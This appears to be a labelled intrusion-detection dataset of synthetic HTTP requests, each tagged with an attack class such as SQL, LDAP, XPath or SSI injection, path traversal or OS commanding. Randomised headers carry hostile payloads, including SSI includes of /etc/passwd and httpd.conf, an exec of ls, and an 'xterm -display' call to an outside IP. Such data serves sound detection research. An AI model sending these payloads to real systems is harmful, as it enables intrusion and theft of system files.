End - Id: 45371
Start - Id: 44907
class: PathTransversal
GET /ih2htbaemeldlrrcl/yrF/b6tsaj3d0qees6rchSs.cfm?iWosmnc1awsa=xg4RRerml%28n3&teonuintWoT8nic=2&irvaulonrnSl=atofc&dzrToj=%2Baoioeexecwindow.opens9%3Aaih1%40&hcn=taunione&cEsf=mPx3J&gdF4RubzV=hXVbg5I%406%40T&tezlhk=.%2F..%2F.%2F..%2F&3yelettt=hmnNtsuhttpoam%3Fntvrm%5B&ghYn8=oun%3Cl HTTP/1.1
Host: 157.116.213.104:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Ei3c-hied6;q=0.4, nee-r
Cache-Control: max-stale=128
Client-ip: 139.102.255.156
Cookie: oifaxetCL=3453128820;av=86;MzoJUFfYIbg=o;8ie2dlesls=70596025;MnCPinputuLjRPAW=hzyIavH0o;Ieotecy=9tahhvHsh4b
Cookie2: $Version="2"
Date: Thu, 06 May 04 16:16:47 UTC
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sun, 23 Oct 05 16:05:19 UTC
If-Unmodified-Since: Fri, 13 Feb 04 24:06:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: http://www.oeanl9.fr/teeaIl/ltmae/msEoisej.tar
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: egTGJTV http://www.nit1p.cz
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 3.6 118.2.60.187
Transfer-Encoding: identity
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 869 www.1pnokeh.shtml "gycoaahndt1t" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44907
Start - Id: 41560
class: SqlInjection
GET /B_1.3Y/ej_WJZO@TP/-Zdivehck@Pl1T5U/ayyk8Bgj-yT@XD3b/sFRaDDcBEkj8LK3xM1.png?dH-hi=7PNKcH&sfyenansoh=%27+++++%2F**%2F++++OR++%2F**%2F%27%27+%3D+%27&8fzetcZlgs5B@2=h%3Db6m%25uaoAShs+&aHoOpOhre2hcoS0=20&qostDegburwa=+dsaF0imgam%7ChidcmsySle&de8rerg=09 HTTP/1.1
Host: www.toet9e.uk
Connection: keep-alive
Accept: video/mpeg, text/html, text/*;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: c-osnajiro;q=0.5, aors-ur;q=0.8, gfLezesc-peribtOs, oaeenkeb-pjlront, hh295iht-d
Cache-Control: max-stale
Client-ip: 157.202.146.106
Cookie: oataja=11;crnl8f1r6=alogs1txvar&nn ui;rhal=o=ot:;rpp=actthiueamyerc;lhtaccesoM9brcp6WfjL=saxGUGKZXlQ;oIeeuaormhOMk=%u(tsleve9hlee
Cookie2: $Version="799"
Date: Sun, 07 Sep 08 17:06:36 GMT
Expect: 100-continue
From: usaacy07@scsi6.be
If-Modified-Since: Mon, 28 Dec 09 06:57:54 CET
If-Unmodified-Since: Tue, 05 Jan 10 16:23:31 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Oct 04 18:27:15 GMT
Max-Forwards: 284
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="uSmsdotr"
Authorization: NTLM MHkzcm9XZWt0b0hwdDlydDlzZWdpcWVFZmgzZXJyZWVuZQ==
Range: 4-728143
Referer: /ghaby3v/hm3sdq/rogjme/wdozsl.jsp
TE: trailers,trailers,chunked;q=0.9
Trailer: Connection
User-Agent: lulli2t3/0.7.7.3.7
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1852x515
Via: HTTP/1.3 www.ehFYs7ne.shtml, 0.4 18.45.192.180, FTP/4.9 39.166.25.99
Transfer-Encoding: identity
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 868 212.59.150.87 "tTe6e" "Fri, 15 May 09 11:43:43 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41560
Start - Id: 39372
class: SSI
GET /Yz/iU2ubD1Kx5-F0xUo./oiWlenoi/aT@MQ8vTZtroBes_TQ/tenl9.css?hlhI=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&window.open@GI_cpP=shinput+rvbscript7tqgo%254s&hzahsegeapeno=%5Bolocationhe HTTP/1.1
Host: 119.226.30.179:276
Connection: e1of
Accept: image/*;q=0.9, image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: compress, deflate;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 19.66.228.157
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="493"
Date: Tue, 12 Aug 08 09:21:08 UTC
ETag: "M6Z8.Nnc9peS.SgsaJ"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Wed, 01 Oct 08 24:50:30 CET
If-Unmodified-Since: Sun, 01 May 05 07:58:35 CET
If-Match: "p1yHeFT9Dtrw-Mj"
If-None-Match: "ItNHGv2j75thLlL5-"
If-Range: Wed, 20 Feb 08 08:46:09 UTC
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: 396191-323,-9
Referer: http://www.zod2rh.ch/eiq476/iSossy.jpg
TE: chunked,deflate,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/1.8 (Windows; U; WinNT 9.4; za-dc; rv:7.0.9) Gecko/01976963
UA-CPU: 68000
UA-Disp: 939,8855,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: 9.8 91.2.152.197, haroe/1.8 146.171.90.74, FTP/6.0 www.fslhrtal.htm:92215
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 190 47.240.214.57 "eTmefeexEnteh0llLor" "Fri, 17 Feb 06 05:54:12 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 687226920
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39372
Start - Id: 39218
class: SSI
GET /awjFTVCGS_s_VDA/gtisnaihnpan/8_hPKDkAQV1Uxnbv4/46Lx0l3SMy6KD/oifepeenhdesOie/WTm49WAHb/l8.t/KAdiv/ah8eoMimotttatulnkpt/uySL6iQuH9AXGcMauuRH/illjLa.html?rtsaysf=12S&Iche=%3C%21--%23email+fromhost%3D%22www.ytxDhahr.com%22+tohost%3D%22mailbox.osi.com%22+message%3D%22hEsrwu+eUrQg5+bad9t2+l0ni6j%22+fromaddress%3D%22dlOw.com%22+toaddress%3D%22leswz.rhjT4p.com%22+subject%3D%22csr%22+sender%3D%22eaqS.com%22+replyto%3D%22szgt9n.com%22+cc%3D%22Zri%22+inreplyto%3D%22gfu9+etm4+7mcdhs%22+id%3D%22A7Neamail%22+--%3E&h8ee2tuatlteelt=67289283&WoheelyDe=62344&ztntd=036188909&neeonIllEm=ii&iU6Fe5zS=9&e4Os=neol&hoiTroeICte1=4068755689&asersFoa=816222476&cdrtcnt=8&iEwrjc=dEflf%3Aeu%3Ciksautoexecmb&emiseV=981&mxtermFrsJ0f=vidtasItsmeslikeu HTTP/1.1
Host: www.lnntaNtz.be:80
Connection: close
Accept: image/*, video/*, application/*
Accept-Charset: iso-2022-kr;q=0.9, windows-1252;q=0.9, windows-1252;q=0.6
Accept-Encoding: deflate, gzip, compress;q=0.4, deflate;q=0.9, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 24.82.201.85
Cookie: etme3oOesobs=2186618
Cookie2: $Version="9"
Date: Mon, 11 Oct 04 16:36:21 GMT
ETag: "stS0mrsBNpQBIdeOv"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Fri, 27 Oct 06 04:44:51 GMT
If-Unmodified-Since: Sat, 13 Jun 09 22:20:04 UTC
If-Match: "8y6XS3TIQqZxkyoSF-"
If-None-Match: "usVDk1vL@7hi16MNy5z"
If-Range: *
Max-Forwards: 6042
Pragma: no-cache
Authorization: Basic b0RucWg6Y2F0WXB0a3c=
Range: 5962-
Referer: /maxaodlB/rmm7iimt/steuumns.shtml
TE: trailers,trailers
User-Agent: etnEnNi6 (obJ5Ohj5xq)
UA-Disp: 4572,5584,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 506x400
Via: HTTP/7.4 www.oact6.js, 7.8 www.famia.jpeg, HTTP/6.0 www.eKectRE.jpg:1
Transfer-Encoding: compress
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -------------------------------

null

End - Id: 39218
Start - Id: 37394
class: LdapInjection
GET /eHxEoNaoeftme6/ins7/migrmnTben/iiabeu0euqDf6ceeoa/Q@uS.phpmailbetweenFdLRF/tQ9/ntishrseLE5/eA2INqqjQFPj5Z/o3D-LO/euYB-rHzfb4mXOUUA/reZEcieem3xlOe4.mspx? HTTP/1.0
Host: 229.163.85.199
Connection: keep-alive
Accept: audio/*, text/*, audio/x-wav;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-cache
Cookie: iopgr2Sneoaetkb=) i;rdazsoEyeml=epHreI9d;umstesibha5na=773
Cookie2: $Version="823"
Date: Tue, 13 Jul 04 03:29:24 CET
ETag: "blhGVaP7qA3OySyl"
If-Modified-Since: Mon, 17 Sep 07 05:51:40 CET
If-Unmodified-Since: Fri, 06 Nov 09 17:21:04 GMT
If-Match: *
If-None-Match: "vfypi7bvYVM08aSpa"
Max-Forwards: 192
Pragma: Dy0='n'
Authorization: Digest nonce
Referer: /yttlf/uNZkR/duaa.php3
TE: trailers
Trailer: If-Range
User-Agent: )    (  |   (  cn=*o'brien*   )(mail    =*o    'brien* )
UA-Pixels: 7525x483
Transfer-Encoding: identity
Upgrade: iaz/0.5, Ibd3an/1.5

null

End - Id: 37394
Start - Id: 39628
class: SSI
GET /sahmrlA7ard5maC/yn/2MWW8FD/sla.tiff?lLaef8=eoo695h&EcuTeontbsbe=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&NearLzliUhsza=ctjl7O HTTP/1.0
Host: 143.42.42.12
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.5, cp-932;q=0.8
Accept-Encoding: identity, identity, identity;q=0.3, compress
Accept-Language: eei8-wxni9at;q=0.8, tbd-2seaonxe;q=0.9, n2-3ray
Cache-Control: only-if-cached
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="232"
Date: Fri, 19 May 06 06:41:20 UTC
ETag: "@Py@vCbgWDBllPns"
Expect: eninei
From: nneTpp@ds2o4khd.org
If-Modified-Since: Wed, 24 Mar 04 21:53:15 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: "_SLt8K4i53beQ2dK5"
If-None-Match: *
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic amdzT3BtOmgxYWg=
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: /yrute.txt
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: cE6Aus/1.9.6.9
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: s5siuc; Amsanteh=2uiWS
Upgrade: Eyls/5.9, r7a/3.5, emaet9/3.7, Got/3.4
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 48.154.117.69
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39628
Start - Id: 49758
class: XPathInjection
GET /opJUgqC4shw/aBobebtfoayc/2cSpmfzjGL7g8KWpe/wehbeetadtoridw2it/3i1lseicrnesh/0oM/nu/Toh.htm?tatrnotc=dh6snxmdsnl&ci3sbantywrdH6=622&eaqShse=n6p%2Feno3%2Fenon%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D2%5D+++%7C++++Td%2Fa%2Fitsao%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D710%5D+or+%27mmcaDti%27++%3D%27&8rarlu9num0=tfh HTTP/1.0
Host: 92.233.195.11
Connection: close
Accept: text/*;q=0.6, image/*;q=0.5, image/png;q=0.8
Accept-Charset: shift_jis;q=0.8, koi8;q=0.4
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: SEo3-out, oNie-snoeaugb
Cache-Control: max-stale=646
Client-ip: 149.198.73.153
Cookie: trsHld5ctCion=nodeiE\;mk=i2vintloNhrsr;du=6
Cookie2: $Version="46"
Date: Fri, 29 Sep 06 21:43:00 GMT
ETag: W/"C6vM2QmYRX16nGaa"
Expect: 100-continue
From: 1ni9pe@Genwbli.net
If-Modified-Since: Fri, 25 Nov 05 24:36:35 GMT
If-Unmodified-Since: Sun, 17 Jul 05 10:57:07 UTC
If-Match: "KDRaK2RxcLF0ECBI"
If-None-Match: "YPZXrM-LAwMFrNkV"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 8888
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c2dlZ2VvbG9pTmZla25DRmV0ZWVoMDBvZXRhbGFteER0Nzdud0U=
Range: 186464-,-8
Referer: /eaoS.php
TE: deflate
Trailer: Cache-Control
User-Agent: ntorulsck2/9.3.0.6
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 9.6 160.211.123.163, an8npc/8.5 66.65.46.201:25
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49758
Start - Id: 39467
class: SSI
GET /reCnHoAwkKjb/brphQXGC@GrMp_Hh/oTpnfe.cgi?on6eEsS=61m&Wq@TH=rGKmFQD&beabdew=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&aea1ion=8wre&lpbqiNg2=33807757&link60eqR.=aZvN97PI&mT=teb&rpD8mdYDr=20&7kwe5im5nLy=yoh-ne&jhashErWnShierV=sed+eLb&lhthe0n=irandosbwal&nfanngRtol=376&Aacdeot=0555348 HTTP/1.1
Host: 172.238.204.38:80
Connection: close
Accept: audio/*;q=0.5, text/plain, text/plain;q=0.8
Accept-Charset: windows-1257;q=0.8, x-mac-icelandic, ks_c_5601-1987;q=0.2, windows-1258;q=0.3, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Cookie2: $Version="5"
Date: Mon, 25 May 09 08:23:25 GMT
ETag: "LhCcRWhjKnJRhPq"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Thu, 28 May 09 01:42:21 GMT
If-Unmodified-Since: Sun, 20 Sep 09 06:36:51 CET
If-Match: *
If-None-Match: ".KV.oxDmnSzNWUfP"
If-Range: *
Max-Forwards: 6
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: NTLM c2NiamVlZWhhZGR0YWhlb2VoRWVzaHRmMGFjZjJPdWl0eWV0aHNkRGlFZGRvdmlu
Range: -2397
Referer: /afeb8a.wav
TE: gzip
Trailer: Referer
User-Agent: Mozilla/9.6 (compatible; Konqueror/5.8; Mac OS X; HaaiDIa; mghrseow)
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 734x0733
Via: sorier/7.9 51.84.209.111, FTP/7.4 43.149.2.58
Transfer-Encoding: compress
Upgrade: n7p/6.1, Nhoc/0.6
Warning: 551 9.100.116.49 "enainhotv" 
----: -------------------------------------------------

null

End - Id: 39467
Start - Id: 36860
class: LdapInjection
GET /9SlwXY5OP.html?@CKIt5yJ2LGF=bbqmcuE&scadabegnN=t7-&sewct=3437342&csg6=cdidgzw&OFcf3G=dnidwinntaplibeibte&tifg4chd=2096769661&irmlhnigsneot=fQkpjpy&YqQlibyw=17&eboarsc=4&YDz4=oqmdeeiefm HTTP/1.1
Host: 236.169.244.172
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 27)(&(objectClass=enn)(|(sn  = 51i)(cn=nea J*))
Cache-Control: no-cache
Client-ip: 44.222.6.171
Cookie: aHha=b ;deall nqsoZhta
Cookie2: $Version="9"
Date: Thu, 05 Aug 04 08:07:41 GMT
ETag: "93Pa0A.Gi0zdrPvWdQy1"
Expect: 100-continue
From: lvelladt@3trbvtitH.net
If-Modified-Since: Tue, 09 Feb 10 12:36:39 UTC
If-Unmodified-Since: Sat, 29 Sep 07 07:02:59 UTC
If-Match: "VbC-KAmUT7dYnVe5X"
If-None-Match: "CrHot.wjLnFlFDel0-@"
If-Range: Sun, 07 Dec 08 19:49:37 GMT
Max-Forwards: 98
MIME-Version: 9.1
Pragma: l=ik
Proxy-Authorization: Digest algorithm=cee6r
Authorization: Digest uri=http://eiecdnRr.ch/Iftd/y8awyiFe.png
Range: -60124,-566,456840-
Referer: http://phh64Nu.it/tEo6h/arlmBnoe/ozueltne/olhbsrql.swf
TE: chunked;q=0.7,gzip
Trailer: Trailer
User-Agent: ngcdlrv (w4DEGQ; sI9-E4KN; miurHjlw)
UA-CPU: MIPS
UA-Disp: 564,7539,32
UA-Color: color32
UA-Pixels: 6170x381
Via: 5.3 www.ccmse.tiff, HTTP/8.0 186.91.148.181
Transfer-Encoding: 3em9h0
Warning: 867 89.104.184.212 "huesnmueeatale" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36860
Start - Id: 37876
class: LdapInjection
GET /vWKevGl/N_-/dPF.pl?drLmyqnou4dmnfE=ietcehdqe&onsix=eodrmebri&cysa0Becsese=39&uirnyenaxa=8480%29%28%26%28objectClass%3DEdna%29%28%7C%28sn%3Dked%29%28cn%3DRs++J*%29%29&wJeseeEb=Thdslhome&hi2as=r%3E%7Ctonavbscriptt4dt&ortisim=ryB6pms%40C8eI&afyvmtr4n=tmplitsoeh&ewbenRuwreeh5=xlxrtetnAms3&01leabacfesens=3uaccess_logo%2F&Weii6hteuefsse=21036853&im311ttrdRO=0&zh2nEidh7=hesnan HTTP/1.0
Host: www.fftn4eidN.com
Connection: enkuweD
Accept: video/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.9, deflate;q=0.1, gzip, identity;q=0.0
Accept-Language: *
Cache-Control: rarekuA=uaddde
Client-ip: 243.107.176.204
Cookie: 6c=78;5b1ngchnekpeos=il:adminy|i8gsee0 insert
Cookie2: $Version="671"
Date: Wed, 01 Jul 09 17:35:48 UTC
ETag: W/"k8Pvcbxx5F27tzq"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Sat, 10 Apr 04 15:25:38 GMT
If-Unmodified-Since: Mon, 08 Oct 07 12:36:40 GMT
If-Match: "j03sBA-skXanwNiI"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: Thu, 01 May 08 02:27:52 CET
Max-Forwards: 8570
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: Digest nc=EC41B5Fc
Range: 89-,46-035533,8-609
Referer: /tons.mpeg
TE: gzip,gzip,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: soKZwYlvo http://www.LHa9Ee.fr
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.1 178.2.110.138:185, 7.6 www.eepQitop.css, 8.4 231.254.118.238
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 829 201.112.203.99:9152 "tindRfilanlsihtasia" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37876
Start - Id: 40010
class: SSI
GET /r3tsrmrdjRaracdt2ts/documentE@Sulocation/nnqopv8qeKzhe/sthogpfhey3pmeo/4Ehtgd/6w88NIrtMB5WL1/ojKzi/axrnier5ieraa4tfmlt.htm?uee=5306556677&DbodyJKacE=424&eeehiw9aludt3=olk9&eepa=8316&cuCdSes3o=vmwesAgo&tee=Teaine3dht57urnia&evlrceAarte=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fls+-l+++++%2Fhome%2Frieudbalts%2F5rkn%22+++--%3E&s8mr4ntifz=7&hamTpte7zes=475472&iifejn=acw&n5misihw=btt%5C%3C&F@59N3La_YTc=1nipyiB9Sb&kIufx.Cd14=qrfjj31jX&a6sa42t=e HTTP/1.1
Host: www.zodai.de:94
Connection: close
Accept: image/gif, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: sd-f;q=0.1, emaso-njeilm4e;q=0.1, n-ouren
Cache-Control: max-age=34
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Wed, 14 Mar 07 13:30:34 GMT
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Mon, 01 Dec 08 04:21:23 GMT
If-Unmodified-Since: Thu, 31 Dec 09 24:04:13 UTC
If-Match: "jUYhTI3LdeMi-gZsyFTr"
If-None-Match: *
If-Range: *
Max-Forwards: 81
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: l6eean drgnj=ervo3i
Range: 4761-
Referer: /aeesdeea/htediAa7/oiekece/x2muAto.nsf
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: Mozilla/1.2 (compatible; Konqueror/7.1; Win 9x; iktmE)
UA-CPU: Sparc
UA-Disp: 603,321,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 219x816
Via: 8.7 www.okse5no.shtml
Transfer-Encoding: identity
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40010
Start - Id: 39726
class: SSI
GET /eSspugEteoe/rtaeiH93n4wdenmhvoli/lwdwtoxa1ZBgln/eUWmqyVscuzN.cgi?sOad1aeeuseE=6948537&uonsac=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&ugsaies=3568417&.9le=uRrIet6eaoDu&asth7ntAil2Ut=o%3Eh1ninaeO HTTP/1.1
Host: 164.254.174.132
Connection: close
Accept: video/quicktime
Accept-Charset: windows-1257;q=0.6
Accept-Encoding: identity;q=0.6, compress;q=0.8, deflate, compress;q=0.4, gzip;q=0.2
Accept-Language: odo-sn1eeHu, rtmYa-e7neldrh;q=0.9
Cache-Control: min-fresh=35326
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="346"
Date: Sun, 09 Sep 07 13:06:19 UTC
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Thu, 07 Apr 05 22:40:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 379
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest uri=http://www.itee.fr/t7odpmuc/1nej/tEnlKe/peserlV4/9inen.swf
Range: -58,-7,-12255
Referer: http://ua8gem.de/t3gT.cfm
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.3 (compatible; MSIE 1.2; Linux i586; zasttont)
UA-CPU: x86
UA-Disp: 035,2744,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: FTP/2.7 www.wdoRn9oC.html, FTP/8.2 116.1.185.164:2, HTTP/0.9 www.Rrhnrr.jpg
Transfer-Encoding: compress
Upgrade: asg/6.6, aeyyeD/5.2, eeae/5.5, sfi/1.0
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39726
Start - Id: 42582
class: SqlInjection
GET /n-dscAYJG8_1m8/rmewesSrkt/ei/openphpJyLX/CqRyh2OYkTEvf/igmQt/z1de4AdoagswnwielbU/lr-Nk65JgcUL/fromDIxmliincludefVservicesreplace/wv_CP7tPqMsDg/LJlrcpPZv0VEb.js?ia9ew51gAeaavs=gc89dOtpfdW&5ant=m.Y4T6AvMn&irSecyf=ne3iv+ee&sszc1eY=++%7Cke%5Bvn9wgetrErperldk&nfEu6pigeihe5=%27+OR++%27es9qntPde%27+++++LIKE+++++%27aze%2525&eednzrthlh4pa=654181&r5eniiip=vUeyneoeelvrntl8y&so1wneoq=70923509&5-58YKEKap=6-%40b0QPU&lwdtongseaizn=7163 HTTP/1.0
Host: 225.43.114.245:80
Connection: c1Obam
Accept: video/*;q=0.4, audio/*, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aaiceo5-Qome, dbetnhg-ecekj, wstrze-6sme;q=0.9, vbacth-Emsr
Cache-Control: only-if-cached
Client-ip: 8.53.51.76
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="6"
Date: Sun, 24 Aug 08 07:32:59 UTC
ETag: "HhGZbuy.Xmq6SqA2ziN"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Wed, 10 Jun 09 15:04:01 GMT
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: *
If-Range: "JUNLpo1cT-Dcgjs1Jjy"
Max-Forwards: 8457
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: Digest realm
Range: -327,463619-533,09-501926
Referer: http://www.Aaote.be/iamItuai/hvpbr/t0dr.jsp
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/5.3 (X11; U; Linux i586 4.1; on-os; rv:6.2.0) Gecko/22406977
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 291x0022
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: compress
Upgrade: riol/3.2, lwTs/8.6
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42582
Start - Id: 43653
class: OsCommanding
POST /4hrbrne/CJfn1Lh1XikT/hFqCpZ@AdQaNf58G7Q/saintlrpe84thd.gif? HTTP/1.1
Content-Length: 40
Content-Language: Mr1
Content-Encoding: identity
Content-Location: http://www.eLetfres.be/ehue3otc/shrtehze.dll
Content-MD5: aHRvb2loc2lPeG5oZjdweg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Apr 06 10:03:15 UTC
Last-Modified: Tue, 14 Oct 08 13:56:08 UTC
Host: 201.2.243.228
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5-58;q=0.3, zvnh-a;q=0.0
Cache-Control: no-transform
Cookie: mpeirRteahmt=sandnenoptnd;sssrtm7dwoN=&thtlon?6;Snl2srq3ble=\rxterm    -display     250.70.77.192:0.0;ecaw=ms7BubJVJ;P6fcat3qN.ZTMN=8dall1o
Cookie2: $Version="859"
Date: Tue, 20 Sep 05 08:20:09 UTC
ETag: W/"i0nVL0@3zMDh2jZwj"
Expect: 100-continue
If-Modified-Since: Fri, 18 Apr 08 12:37:38 GMT
If-Unmodified-Since: Thu, 21 Apr 05 03:36:56 CET
If-Match: "94uF_vaTCBf-WgPSKJWj"
If-None-Match: "pDZZ8UYVEFnelnwJnC@V"
If-Range: *
Max-Forwards: 72
MIME-Version: 5.7
Pragma: rnrv=ekt
Authorization: aEees2 ew2Ntxta=mrawmmv
Range: 99-9,-6
